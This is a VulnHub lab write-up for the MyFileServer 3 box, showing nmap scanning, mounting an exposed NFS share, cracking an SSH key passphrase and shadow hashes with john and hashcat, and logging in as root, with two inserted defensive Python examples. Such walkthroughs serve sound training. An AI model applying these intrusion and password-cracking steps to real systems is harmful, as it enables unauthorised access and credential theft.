(VulnHub) [(CK: 03) MyFileServer_3] WriteUP — WalkThrough

AB2
13 min read · Apr 18, 2020


VulnHub Link: https://www.vulnhub.com/entry/ck-03,464/

Description:

This box is an upgraded edition of the previous (MyFileServer 2) box. Multiple ways to get the user and root flags are added. Ping me on twitter @CyberKnight00 if you face any difficulty. Don't stop after finding 1 way, there are more ways. This works better with VirtualBox than VMware.

So no hints for this box, just the fact that this box has many ways to get in and get root! …

As a start, and as always, a quick nmap scan:

C:\Users\ADMIN\Desktop
> nmap -sC -sV 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-14 20:24 GMT Daylight Time
Nmap scan report for 192.168.56.104
Host is up (0.00049s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 34992/udp6 nlockmgr
| 100021 1,3,4 41808/tcp nlockmgr
| 100021 1,3,4 52002/udp nlockmgr
| 100021 1,3,4 58434/tcp6 nlockmgr
| 100024 1 37928/tcp status
| 100024 1 40190/udp6 status
| 100024 1 40894/udp status
| 100024 1 42136/tcp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]
MAC Address: 08:00:27:85:72:62 (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2020-04-15T00:54:54+05:30
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-14T19:24:57
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.04 seconds

We have 8 open ports, and that's a lot …

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

21 (ftp) ==> vsftpd 3.0.2 — Anonymous FTP login allowed

22 (ssh) ==> OpenSSH 7.4

80 (http) ==> Apache httpd 2.4.6

111 (rpc) ==> rpcbind 2–4 (RPC #100000)

139 (netbios-ssn) ==> Samba smbd 3.X — 4.X (workgroup: SAMBA)

445 (netbios-ssn) ==> Samba smbd 4.9.1

2049 (nfs) ==> nfs_acl 3 (RPC #100227)

2121 (ftp) ==> ProFTPD 1.3.5 — Anonymous FTP login allowed

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

The first thing I have to check is the webpage.

Nothing in the page source.. We start DirBuster to brute-force files/folders and we get nothing …!

We have to go back to the FTP servers and the anonymous login.

This was from port 21, and I'm sure we'll get the same on port 2121 unless it is using a different path …

Let's see what we have inside the folder pub


We have some log files … the most useful for us are lastlog (records the last login of each user) and wtmp (records all logins and logouts).

This tool decodes the wtmp file (https://github.com/hjacobs/utmp)

but I prefer reading it with Notepad++ :p (sorry for the awful view)

But we got 2 users from that: smbuser and root (of course :D)

And as I said before, port 2121 uses the same path.

So we don't need the FTP servers anymore, because we don't get many privileges there …
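An added example (not the writeup's tool and not the box's file) that reads a raw wtmp with Python's struct module instead of Notepad++: it assumes the x86_64 glibc record layout and a constructed sample file, and returns which users logged in successfully and from which hosts.

```python
import struct
from collections import OrderedDict

# Record layout of glibc's struct utmp on Linux x86_64 (384 bytes, little-endian):
# ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit (2 x short), ut_session, ut_tv (sec, usec as int32), ut_addr_v6[4], reserved[20].
UTMP_FMT = "<h2xi32s4s32s256shhi2i4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8      # ut_type values for a login and its logout


def _cstr(raw):
    """Decode a NUL-padded fixed-width C string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data):
    """Yield one dict per utmp record in a wtmp blob; refuse truncated input."""
    if len(data) % UTMP_SIZE:
        raise ValueError("truncated wtmp: %d bytes is not a multiple of %d" % (len(data), UTMP_SIZE))
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        yield {"type": f[0], "pid": f[1], "line": _cstr(f[2]), "user": _cstr(f[4]),
               "host": _cstr(f[5]), "time": f[9]}


def login_users(data):
    """Map each user with a successful login (USER_PROCESS) to the set of hosts it came from."""
    seen = OrderedDict()
    for rec in parse_wtmp(data):
        if rec["type"] == USER_PROCESS and rec["user"]:
            seen.setdefault(rec["user"], set()).add(rec["host"])
    return seen


def make_record(ut_type, pid, line, user, host, when):
    """Build one raw record (used only to construct the sample data below)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(), host.encode(),
                       0, 0, 0, when, 0, 0, 0, 0, 0, b"")


# Constructed sample wtmp (not the box's file): two smbuser logins from 192.168.56.1,
# one logout record, and a local root login on tty1.
SAMPLE_WTMP = b"".join([
    make_record(USER_PROCESS, 1201, "pts/0", "smbuser", "192.168.56.1", 1586900000),
    make_record(DEAD_PROCESS, 1201, "pts/0", "", "", 1586900600),
    make_record(USER_PROCESS, 1300, "tty1", "root", "", 1586901000),
    make_record(USER_PROCESS, 1350, "pts/1", "smbuser", "192.168.56.1", 1586902000),
])

if __name__ == "__main__":
    for user, hosts in login_users(SAMPLE_WTMP).items():
        print("%-10s %s" % (user, ", ".join(sorted(hosts)) or "(local)"))
```

On a real file use `login_users(open("wtmp", "rb").read())`; a size that is not a multiple of 384 means a truncated copy or a different architecture's layout.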

Let's go back to the nmap log and to port 111.

What is port 111!?

I don't know how to explain its role, but from my experience I know it is about sharing some folders and mounting them on another computer (in the same host)

and from googling I quote that:

Portmapper is an RPC service, which always listens on tcp and udp 111, 
and is used to map other RPC services (such as nfs, nlockmgr, quotad,
mountd, etc.) to their corresponding port number on the server.

rpcbind only becomes dangerous when we can get a connection to the Network File System (NFS), and by that I mean port 2049:

2049/tcp open  nfs_acl     3 (RPC #100227)

and if you noticed:

| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl

nmap shows us that in the rpcinfo script it runs against the 111 service, and it is clear that it is connected to nfs_acl.

So how do we use all of that …!

C:\Users\ADMIN\Desktop
> showmount -e 192.168.56.104
Exports list on 192.168.56.104:
/smbdata 192.168.56.0/24

So after we use showmount in Linux or Windows,

we see that it is sharing the folder smbdata to 192.168.56.0/24, the local network of my VirtualBox (the image below explains it more)

Now, how to mount this! I had to use Linux for this (because I'm having some trouble mounting it from my Windows)

root@x00xKaliLinux:~# mkdir smbdata
root@x00xKaliLinux:~# mount -t nfs 192.168.56.104:/smbdata ~/smbdata/
root@x00xKaliLinux:~# cd smbdata/

So I had to create a directory named smbdata and mount the NFS share there, and after that we go to that path:

root@x00xKaliLinux:~/smbdata# ls -la
total 864
drwxrwxrwx 8 root root 4096 Apr 14 21:01 .
drwxr-xr-x 35 root root 4096 Apr 14 23:31 ..
drwxrwxrwx 2 root root 4096 Feb 18 12:48 anaconda
drwxrwxrwx 2 root root 22 Feb 18 12:48 audit
-rwxrwxrwx 1 root root 6120 Feb 18 12:48 boot.log
-rwxrwxrwx 1 root root 384 Feb 18 12:48 btmp
-rwxrwxrwx 1 root root 4813 Feb 18 12:48 cron
-rwxrwxrwx 1 root root 31389 Feb 18 12:48 dmesg
-rwxrwxrwx 1 root root 31389 Feb 18 12:48 dmesg.old
drwxrwxrwx 2 root root 6 Feb 18 12:48 glusterfs
-rw-r--r-- 1 ab2 ab2 1766 Mar 19 05:43 id_rsa
-rwxrwxrwx 1 root root 292292 Feb 18 12:48 lastlog
-rwxrwxrwx 1 root root 1982 Feb 18 12:48 maillog
-rwxrwxrwx 1 root root 684379 Feb 18 12:48 messages
-rw-r--r-- 1 root root 128 Mar 19 05:53 note.txt
drwxrwxrwx 2 root root 6 Feb 18 12:48 ppp
drwxrwxrwx 4 root root 43 Feb 18 12:48 samba
-rwxrwxrwx 1 root root 11937 Feb 18 12:48 secure
-rwxrwxrwx 1 root root 0 Feb 18 12:48 spooler
-rw-r--r-- 1 99 99 3906 Feb 19 08:46 sshd_config
-rwxrwxrwx 1 root root 0 Feb 18 12:48 tallylog
-rwxr--r-- 1 99 99 162 Feb 25 15:22 todo
drwxrwxrwx 2 root root 22 Feb 18 12:48 tuned
-rwxrwxrwx 1 root root 25728 Feb 18 12:48 wtmp
-rwxrwxrwx 1 root root 100 Feb 18 12:48 xferlog
-rwxrwxrwx 1 root root 10915 Feb 18 12:48 yum.log

It looks like we are seeing the same content as on FTP with a few new files …

The most sensitive file is id_rsa:


We have a passphrase-protected key here and we need to crack it, so we use ssh2john:

root@x00xKaliLinux:~/Desktop# /usr/share/john/ssh2john.py ~/smbdata/id_rsa 

The output is the hash; we save it to a file and run john on it (I used this tool before in this writeup: https://medium.com/p/db5b565c3860)

P.S.: I had to go back to my Windows, but you can use it in your Linux (I'm just a Windows lover :( )

> johntheripper --wordlist=10k_most_common.txt ssh.john
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
password (id_rsa.txt)
1g 0:00:00:00 DONE (2020-04-14 23:32) 4.201g/s 42016p/s 42016c/s 42016C/s booper..eyphed
Session completed
C:\Users\ADMIN\Desktop
> johntheripper --show ssh.john
id_rsa.txt:password
1 password hash cracked, 0 left

The passphrase is: password. We have to go back to Linux now :p, give id_rsa the right permissions, and try to log in as the user "smbuser" (which we found previously in the wtmp file)
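As an added example, not from the writeup, here is the check a defender would run on key files found lying on a share: it reads the legacy PEM headers (Proc-Type/DEK-Info, the shape of the id_rsa above) or the cipher/KDF names of the openssh-key-v1 format and rates each key. The sample keys are constructed; a legacy-PEM key rates "high" because, as john's cost line above shows, its passphrase goes through a single MD5 round, so guesses run at wordlist speed.

```python
import base64
import struct

def _ssh_string(s):
    """Encode bytes as an SSH length-prefixed string (used only to build sample data)."""
    return struct.pack(">I", len(s)) + s

def _read_ssh_string(blob, off):
    """Read one SSH length-prefixed string from blob at offset off."""
    (n,) = struct.unpack_from(">I", blob, off)
    return blob[off + 4:off + 4 + n].decode("ascii", "replace"), off + 4 + n

def classify_private_key(pem_text):
    """Describe how a private key file is protected at rest and rate its exposure risk."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if "ENCRYPTED PRIVATE KEY" in lines[0]:
        raise ValueError("PKCS#8 keys are not handled by this check")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # New OpenSSH format: cipher and KDF names are the first two strings after the magic.
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\0"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_ssh_string(blob, len(magic))
        kdf, _ = _read_ssh_string(blob, off)
        fmt, encrypted = "openssh-key-v1", cipher != "none"
    else:
        # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is announced by header lines,
        # and the cipher key is derived from the passphrase with a single MD5 round.
        headers = {}
        for line in lines[1:]:
            if ":" not in line:
                break
            k, v = line.split(":", 1)
            headers[k.strip()] = v.strip()
        encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
        cipher = headers.get("DEK-Info", "none").split(",")[0] if encrypted else "none"
        fmt, kdf = "pem", ("md5-1-round" if encrypted else "none")
    if not encrypted:
        risk = "critical"   # whoever can read the file owns the key
    elif fmt == "openssh-key-v1" and kdf == "bcrypt":
        risk = "low"        # bcrypt rounds make offline guessing expensive
    else:
        risk = "high"       # one MD5 round: guesses run at wordlist speed
    return {"format": fmt, "encrypted": encrypted, "cipher": cipher, "kdf": kdf, "risk": risk}

# Constructed samples (not the key from the share); the first mirrors its header shape.
SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDRA==
-----END RSA PRIVATE KEY-----
"""
SAMPLE_PLAIN_PEM = "-----BEGIN RSA PRIVATE KEY-----\nQUJDRA==\n-----END RSA PRIVATE KEY-----\n"
SAMPLE_OPENSSH = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(b"openssh-key-v1\0" + _ssh_string(b"aes256-ctr")
                                     + _ssh_string(b"bcrypt") + _ssh_string(b"\0" * 24)).decode()
                  + "\n-----END OPENSSH PRIVATE KEY-----\n")
```

A key rated high or critical can be re-encrypted in place with `ssh-keygen -p -o -a 100 -f id_rsa` (new format, bcrypt KDF with 100 rounds); the other fix is not exporting the directory that holds it.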

root@x00xKaliLinux:~/Desktop# ssh -i id_rsa smbuser@192.168.56.104
##############################################################################################
# InfoSec Warrior #
# --------- www.InfoSecWarrior.com ------------ #
# My File Server - 3 #
# Just a simple addition to the problem #
# Designed By :- CyberKnight #
# Twitter :- @CyberKnight00 #
##############################################################################################
Enter passphrase for key 'id_rsa':
Last login: Wed Apr 15 04:03:57 2020 from 192.168.56.1

And that logged in without problems :D no need for any other services now!

We could also use smbclient on ports 139/445, and this is how …

root@x00xKaliLinux:~/smbdata# smbmap -H 192.168.56.104
[+] IP: 192.168.56.104:445 Name: 192.168.56.104
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
smbdata READ, WRITE smbdata
smbuser NO ACCESS smbuser
IPC$ NO ACCESS IPC Service (Samba 4.9.1)
root@x00xKaliLinux:~/smbdata# smbclient \\\\192.168.56.104\\smbdata
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Tue Apr 14 21:01:45 2020
.. D 0 Tue Feb 18 12:47:54 2020
anaconda D 0 Tue Feb 18 12:48:15 2020
audit D 0 Tue Feb 18 12:48:15 2020
boot.log N 6120 Tue Feb 18 12:48:16 2020
btmp N 384 Tue Feb 18 12:48:16 2020
cron N 4813 Tue Feb 18 12:48:16 2020
dmesg N 31389 Tue Feb 18 12:48:16 2020
dmesg.old N 31389 Tue Feb 18 12:48:16 2020
glusterfs D 0 Tue Feb 18 12:48:16 2020
lastlog N 292292 Tue Feb 18 12:48:16 2020
maillog N 1982 Tue Feb 18 12:48:16 2020
messages N 684379 Tue Feb 18 12:48:17 2020
ppp D 0 Tue Feb 18 12:48:17 2020
samba D 0 Tue Feb 18 12:48:17 2020
secure N 11937 Tue Feb 18 12:48:17 2020
spooler N 0 Tue Feb 18 12:48:17 2020
tallylog N 0 Tue Feb 18 12:48:17 2020
tuned D 0 Tue Feb 18 12:48:17 2020
wtmp N 25728 Tue Feb 18 12:48:17 2020
xferlog N 100 Tue Feb 18 12:48:17 2020
yum.log N 10915 Tue Feb 18 12:48:17 2020
sshd_config N 3906 Wed Feb 19 08:46:38 2020
todo N 162 Tue Feb 25 15:22:29 2020
id_rsa N 1766 Thu Mar 19 05:43:16 2020
note.txt N 128 Thu Mar 19 05:53:12 2020
19976192 blocks of size 1024. 18243532 blocks available

Going back to our active shell; from now on I'll be quicker.

We have a weird binary file runme with root privileges; we run it and see:

[smbuser@fileserver ~]$ ./runme
Why are you here ?!

So I had to download the file to debug it … (by running python SimpleHTTPServer on port 8080)

Meanwhile I ran LinEnum.sh for more … and it says that the shadow file is readable, which means that we have some hashes to crack :D

root:$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0:18317:0:99999:7:::
smbuser:$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1:18317:0:99999:7:::
bla:$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.:18317:0:99999:7:::

Let's clean this up and leave only the hashes. The hash type is sha512crypt, SHA512 (Unix), which has the form $6$salt$hash.

$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0
$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1
$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.

We need to take this to hashcat :D

Bad news: I have the lowest-end GPU (Nvidia GeForce 210) and CPU in the world.

So I had to use a friend's laptop just to show you the operation:

MODE: 1800
TYPE: sha512crypt $6$, SHA512 (Unix)
HASH: $6$72820166$U4DVzpcYxgw7MVVDGGvB2/H5lRistD5.Ah4upwENR5UtffLR4X4SxSzfREv8z6wVl0jRFX40/KnYVvK4829kD1
PASS: hashcat

That is the mode we'll use in hashcat:

D:\hashcat-5.1.0>hashcat64 -m 1800 -a 0 -o found.txt hashes rockyou.txt
hashcat (v5.1.0) starting...
* Device #1: This hardware has outdated CUDA compute capability (2.1).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
We are waiting for updated OpenCL drivers from Intel.
You can use --force to override, but do not report related errors.
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GT 820M, 512/2048 MB allocatable, 2MCU
OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) HD Graphics 4400, skipped.
* Device #3: Intel(R) Core(TM) i3-4030U CPU @ 1.90GHz, skipped.
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Uses-64-Bit
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 5 secs
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Update your OpenCL runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: hashes
Time.Started.....: Wed Apr 15 20:42:18 2020 (47 secs)
Time.Estimated...: Thu Apr 16 09:58:04 2020 (13 hours, 14 mins)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 601 H/s (10.07ms) @ Accel:32 Loops:16 Thr:32 Vec:1
Recovered........: 1/3 (33.33%) Digests, 1/3 (33.33%) Salts
Progress.........: 36864/43033152 (0.09%)
Rejected.........: 0/36864 (0.00%)
Restore.Point....: 12288/14344384 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3280-3296
Candidates.#1....: gucci1 -> chanda
Hardware.Mon.#1..: Temp: 58c
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

That's bad too :(

Speed.#1.........:      601 H/s (10.07ms) @ Accel:32 Loops:16 Thr:32 Vec:1

So now I have the last resort, which is asking an online friend, and after 5 min:

$6$ePvCCtcG$mAQFQldd7/k25o51NK2gkccL24r7DzhrqZGTyjoLlhOCKb060BuB/X6Qlc7noUv61K9NXtaPeWnYRlLWigBfF1:password
$6$zWU8uYN5$iHT030gilg9kM1iYCZt/z3q4fWpSNHwwLElFWof/C3MfbqgmbWAnG5sXFEdkMj60MLvYc6HEB7/REq2u2aVVh0:infosec
$6$ENV.HdIK$huk85ZxIDwa7jK8W1i0cfV/s67QDyYFaEHVrrpKjYesEJXAiaTo4jtNvfmKD4y1ULhub6gahOVIBaXxcpgm0n.:itiseasy

Let's try these :D

[smbuser@fileserver ~]$ su -
Password:
Last login: Wed Apr 15 13:27:33 IST 2020 on pts/0
Last failed login: Wed Apr 15 13:33:08 IST 2020 on tty1
There was 1 failed login attempt since the last successful login.
[root@fileserver ~]# pwd
/root
[root@fileserver ~]# ls -la
total 40
drwxr--r--. 4 root root 4096 Feb 27 00:53 .
dr-xr-xr-x. 18 root root 4096 Feb 18 17:17 ..
lrwxrwxrwx 1 root root 9 Feb 25 14:02 .bash_history -> /dev/null
-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc
-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrc
drwxr--r--. 3 root root 18 Feb 18 15:04 .pki
-rwxr--r-- 1 root root 449 Feb 27 00:27 proof.txt
drwxr--r-- 2 root root 46 Feb 25 15:22 .ssh
-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rwxr--r-- 1 root root 6270 Feb 21 12:30 .viminfo
[root@fileserver ~]# cat proof.txt
_______ __ _____ _____
/ ____(_) /__ / ___/___ ______ _____ _____ |__ /
/ /_ / / / _ \\__ \/ _ \/ ___/ | / / _ \/ ___/ ______ /_ <
/ __/ / / / __/__/ / __/ / | |/ / __/ / /_____/ ___/ /
/_/ /_/_/\___/____/\___/_/ |___/\___/_/ /____/
flag : 7be300997079eaebcdf9975ede6746e9
[root@fileserver ~]#

And we're r00t.

For the binary method, I'll try to write about it next time.

Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeups and tools can be found here:
https://github.com/ab2pentest


AB2

Security Engineer @ TS | Ethical Hacker | Content Creator | CTF Player.